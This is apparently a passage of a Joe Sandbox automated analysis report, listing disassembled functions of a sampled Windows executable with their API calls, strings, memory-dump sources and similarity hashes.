                                                                                            • Part of subcall function 003E916C: _free.LIBCMT ref: 003E91BF
                                                                                            • Part of subcall function 003E916C: _free.LIBCMT ref: 003E91D1
                                                                                            • Part of subcall function 003E916C: _free.LIBCMT ref: 003E91E3
                                                                                            • Part of subcall function 003E916C: _free.LIBCMT ref: 003E91F5
                                                                                            • Part of subcall function 003E916C: _free.LIBCMT ref: 003E9207
                                                                                            • Part of subcall function 003E916C: _free.LIBCMT ref: 003E9219
                                                                                            • Part of subcall function 003E916C: _free.LIBCMT ref: 003E922B
                                                                                            • Part of subcall function 003E916C: _free.LIBCMT ref: 003E923D
                                                                                            • Part of subcall function 003E916C: _free.LIBCMT ref: 003E924F
                                                                                            • Part of subcall function 003E916C: _free.LIBCMT ref: 003E9261
                                                                                          • _free.LIBCMT ref: 003E95C6
                                                                                            • Part of subcall function 003E59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?), ref: 003E59D8
                                                                                            • Part of subcall function 003E59C2: GetLastError.KERNEL32(?,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?,?), ref: 003E59EA
                                                                                          • _free.LIBCMT ref: 003E95E8
                                                                                          • _free.LIBCMT ref: 003E95FD
                                                                                          • _free.LIBCMT ref: 003E9608
                                                                                          • _free.LIBCMT ref: 003E962A
                                                                                          • _free.LIBCMT ref: 003E963D
                                                                                          • _free.LIBCMT ref: 003E964B
                                                                                          • _free.LIBCMT ref: 003E9656
                                                                                          • _free.LIBCMT ref: 003E968E
                                                                                          • _free.LIBCMT ref: 003E9695
                                                                                          • _free.LIBCMT ref: 003E96B2
                                                                                          • _free.LIBCMT ref: 003E96CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID:
                                                                                          • API String ID: 161543041-0
                                                                                          • Opcode ID: 936eff4db4a73d66c65d9ab7ddd70b49f1e170db63f337f528dffd2bc9d8655b
                                                                                          • Instruction ID: e30dd789f22dc4a3a0c34ad7233767edcef46c5497552f9e8be01eb62c6e129f
                                                                                          • Opcode Fuzzy Hash: 936eff4db4a73d66c65d9ab7ddd70b49f1e170db63f337f528dffd2bc9d8655b
                                                                                          • Instruction Fuzzy Hash: CD315E716047A5EFDF23AA3AD845B9673E9AF41320F11461BF489DB1D2DF31AC808B10
                                                                                          APIs
                                                                                          • GetWindow.USER32(?,00000005), ref: 003DB8DD
                                                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 003DB90C
                                                                                            • Part of subcall function 003D0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,003CAC49,?,?,?,003CABF8,?,-00000002,?,00000000,?), ref: 003D0B28
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003DB92A
                                                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 003DB941
                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 003DB954
                                                                                            • Part of subcall function 003D8B22: GetDC.USER32(00000000), ref: 003D8B2E
                                                                                            • Part of subcall function 003D8B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 003D8B3D
                                                                                            • Part of subcall function 003D8B22: ReleaseDC.USER32(00000000,00000000), ref: 003D8B4B
                                                                                            • Part of subcall function 003D8ADF: GetDC.USER32(00000000), ref: 003D8AEB
                                                                                            • Part of subcall function 003D8ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 003D8AFA
                                                                                            • Part of subcall function 003D8ADF: ReleaseDC.USER32(00000000,00000000), ref: 003D8B08
                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 003DB97B
                                                                                          • DeleteObject.GDI32(00000000), ref: 003DB982
                                                                                          • GetWindow.USER32(00000000,00000002), ref: 003DB98B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                          • String ID: STATIC
                                                                                          • API String ID: 1444658586-1882779555
                                                                                          • Opcode ID: 9fd9ebff20dbbb6b589314c127ac87fd6d7f3a4abe5fe30981f251cd4a449762
                                                                                          • Instruction ID: 26e8cc3280a8e3f0f3583cff0671fc25f8efcd0903aaf6746e257ad0f9c2faa1
                                                                                          • Opcode Fuzzy Hash: 9fd9ebff20dbbb6b589314c127ac87fd6d7f3a4abe5fe30981f251cd4a449762
                                                                                          • Instruction Fuzzy Hash: BB21D8B3540614BBDB236B64EC46FFEB66CEF04701F024013FA05AA291CB745D45C6B6
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 003E623F
                                                                                            • Part of subcall function 003E59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?), ref: 003E59D8
                                                                                            • Part of subcall function 003E59C2: GetLastError.KERNEL32(?,?,003E9301,?,00000000,?,00000000,?,003E9328,?,00000007,?,?,003E9725,?,?), ref: 003E59EA
                                                                                          • _free.LIBCMT ref: 003E624B
                                                                                          • _free.LIBCMT ref: 003E6256
                                                                                          • _free.LIBCMT ref: 003E6261
                                                                                          • _free.LIBCMT ref: 003E626C
                                                                                          • _free.LIBCMT ref: 003E6277
                                                                                          • _free.LIBCMT ref: 003E6282
                                                                                          • _free.LIBCMT ref: 003E628D
                                                                                          • _free.LIBCMT ref: 003E6298
                                                                                          • _free.LIBCMT ref: 003E62A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 752c0da590705ff72869c93940e9090ba82cbe55852579a14b38df66f01ab149
                                                                                          • Instruction ID: 7d2a19b3644fa90e5ff60d70cfddc09c199208fc9cba6c3911b7a75e64b9715f
                                                                                          • Opcode Fuzzy Hash: 752c0da590705ff72869c93940e9090ba82cbe55852579a14b38df66f01ab149
                                                                                          • Instruction Fuzzy Hash: 0E11A775200658FFCF02EF56C842CD93B65FF45364B4146A1BA884F1A2DB31DE509B40
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ;%u$x%u$xc%u
                                                                                          • API String ID: 0-2277559157
                                                                                          • Opcode ID: ea63bbaaf82f5e6f02546e8366672fd4c3071ac8c7f02904dd117c5eb21ec76e
                                                                                          • Instruction ID: e691c343cf3cb1a17ab6b255a1356b54ab55bf29a55b22a7e1a264b7d0264f16
                                                                                          • Opcode Fuzzy Hash: ea63bbaaf82f5e6f02546e8366672fd4c3071ac8c7f02904dd117c5eb21ec76e
                                                                                          • Instruction Fuzzy Hash: 93F104716043805BDF1BEB688895FFB7799AF95300F08496DF88ADF283DA649C44C762
                                                                                          APIs
                                                                                            • Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
                                                                                            • Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341
                                                                                          • EndDialog.USER32(?,00000001), ref: 003D99AF
                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 003D99DC
                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 003D99F1
                                                                                          • SetWindowTextW.USER32(?,?), ref: 003D9A02
                                                                                          • GetDlgItem.USER32(?,00000065), ref: 003D9A0B
                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 003D9A1F
                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 003D9A31
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                          • String ID: LICENSEDLG
                                                                                          • API String ID: 3214253823-2177901306
                                                                                          • Opcode ID: eeabbc580e01942efb769519d1494cfbbb6c7ee93403b6a5f08decdc5949b294
                                                                                          • Instruction ID: 434b2b777a5e1b3eabc85742451a8ea4ac9be84c97fce9aa01387a80fcdfaff1
                                                                                          • Opcode Fuzzy Hash: eeabbc580e01942efb769519d1494cfbbb6c7ee93403b6a5f08decdc5949b294
                                                                                          • Instruction Fuzzy Hash: 24210B732002047BD6136F75FE89F7B3B6DEB46B44F02401AF604A62A0CB729C01D676
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: __alldvrm$_strrchr
                                                                                          • String ID: N,>$N,>$N,>
                                                                                          • API String ID: 1036877536-4132975775
                                                                                          • Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                          • Instruction ID: aeb02d43ff48b6a1b9ddada2693d6eebee7ee48f2f5c43eda5c17d7db4605af3
                                                                                          • Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                          • Instruction Fuzzy Hash: 66A158329103E69FEB238F1AC892BAEBBA5EF75394F15436DD4959B2C2C2349C41C750
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C9232
                                                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 003C9255
                                                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 003C9274
                                                                                            • Part of subcall function 003D0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,003CAC49,?,?,?,003CABF8,?,-00000002,?,00000000,?), ref: 003D0B28
                                                                                          • _swprintf.LIBCMT ref: 003C9310
                                                                                            • Part of subcall function 003C3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C3F6E
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 003C9385
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 003C93C1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                          • String ID: rtmp%d
                                                                                          • API String ID: 2111052971-3303766350
                                                                                          • Opcode ID: d4aca5050fae1ceadec48c71a0ee1c7fd7e23f72bdf23b6965bc2cab542b4337
                                                                                          • Instruction ID: d2675ab571d619091ef51f6fe66532fab18ecb4f43b7bc6f9d780fc0fbd04dff
                                                                                          • Opcode Fuzzy Hash: d4aca5050fae1ceadec48c71a0ee1c7fd7e23f72bdf23b6965bc2cab542b4337
                                                                                          • Instruction Fuzzy Hash: 30418D76911299AADF22EB60CD99FEE777CAF45340F0640AAF505E7082DB308F45CB60
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,003D8705,?), ref: 003D7FBA
                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 003D7FDB
                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 003D8002
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                          • API String ID: 4094277203-4209811716
                                                                                          • Opcode ID: b86473a1632f5a7ca0a002ad5c281304366ecafa947a887b4d0687d4ba35970d
                                                                                          • Instruction ID: a69e2305ad4274df6af1140b7ee71acfe6dd187e2dd5a8c4e33a514ab0bd009f
                                                                                          • Opcode Fuzzy Hash: b86473a1632f5a7ca0a002ad5c281304366ecafa947a887b4d0687d4ba35970d
                                                                                          • Instruction Fuzzy Hash: 7B3125731083557ED727AB65AC06FABB79CDF52720F10460BF5109A2C2FBB49909C3A5
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 003D7DAF
                                                                                          • GetTickCount.KERNEL32 ref: 003D7DCD
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003D7DE3
                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003D7DF7
                                                                                          • TranslateMessage.USER32(?), ref: 003D7E02
                                                                                          • DispatchMessageW.USER32(?), ref: 003D7E0D
                                                                                          • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 003D7EBD
                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 003D7EC7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 4150546248-0
                                                                                          • Opcode ID: 3318ee053b057e2e16a77c3fa69ffa85e5aaf3ffec3e7dcdee3c1125d53ace30
                                                                                          • Instruction ID: c71b0b730f5d3313dd035f9425aa9bb8197e99bed510f402f1c89b57f23023e4
                                                                                          • Opcode Fuzzy Hash: 3318ee053b057e2e16a77c3fa69ffa85e5aaf3ffec3e7dcdee3c1125d53ace30
                                                                                          • Instruction Fuzzy Hash: 55414B722087069FD716DF65D88892B77EDEF48704F01086EB549C6251EB61EC49CB62
                                                                                          APIs
                                                                                          • __aulldiv.LIBCMT ref: 003CFE33
                                                                                            • Part of subcall function 003CA8E0: GetVersionExW.KERNEL32(?), ref: 003CA905
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 003CFE5C
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 003CFE6E
                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 003CFE7B
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003CFE91
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003CFE9D
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 003CFED3
                                                                                          • __aullrem.LIBCMT ref: 003CFF5D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                          • String ID:
                                                                                          • API String ID: 1247370737-0
                                                                                          • Opcode ID: 217d53e07aa54a0289da932a5e3b298c1d0e215a837bd60c8212f1b21482d6c8
                                                                                          • Instruction ID: fb3816da286aac49d0f85f1c315ad74e1c26d1276f68c103d871b14ab4198d75
                                                                                          • Opcode Fuzzy Hash: 217d53e07aa54a0289da932a5e3b298c1d0e215a837bd60c8212f1b21482d6c8
                                                                                          • Instruction Fuzzy Hash: D94119B64083069FC315DF65C880AABF7F9FB88714F004A2EF59692650E735E948DB52
                                                                                          APIs
                                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,003ECCE2,00000000,00000000,00000000,00000000,00000000,?), ref: 003EC5AF
                                                                                          • __fassign.LIBCMT ref: 003EC62A
                                                                                          • __fassign.LIBCMT ref: 003EC645
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 003EC66B
                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,003ECCE2,00000000,?,?,?,?,?,?,?,?,?,003ECCE2,00000000), ref: 003EC68A
                                                                                          • WriteFile.KERNEL32(?,00000000,00000001,003ECCE2,00000000,?,?,?,?,?,?,?,?,?,003ECCE2,00000000), ref: 003EC6C3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1324828854-0
                                                                                          • Opcode ID: 60868fa51bc45af4afcb57ca1e8d9efa93bb46257bd58a49629fc5b0e551e96c
                                                                                          • Instruction ID: ce98a5d1a77fb41aaee0d4e633f69f57fc25435fa2d2f42d651d7b6518e5354a
                                                                                          • Opcode Fuzzy Hash: 60868fa51bc45af4afcb57ca1e8d9efa93bb46257bd58a49629fc5b0e551e96c
                                                                                          • Instruction Fuzzy Hash: 4F51D1B09102599FCB11CFA9D881BEEBBF8FF08300F14525AE551E7291E730A942CB64
                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(00000800,?), ref: 003DB0EF
                                                                                          • _swprintf.LIBCMT ref: 003DB123
                                                                                            • Part of subcall function 003C3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C3F6E
                                                                                          • SetDlgItemTextW.USER32(?,00000066,00403122), ref: 003DB143
                                                                                          • _wcschr.LIBVCRUNTIME ref: 003DB176
                                                                                          • EndDialog.USER32(?,00000001), ref: 003DB257
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
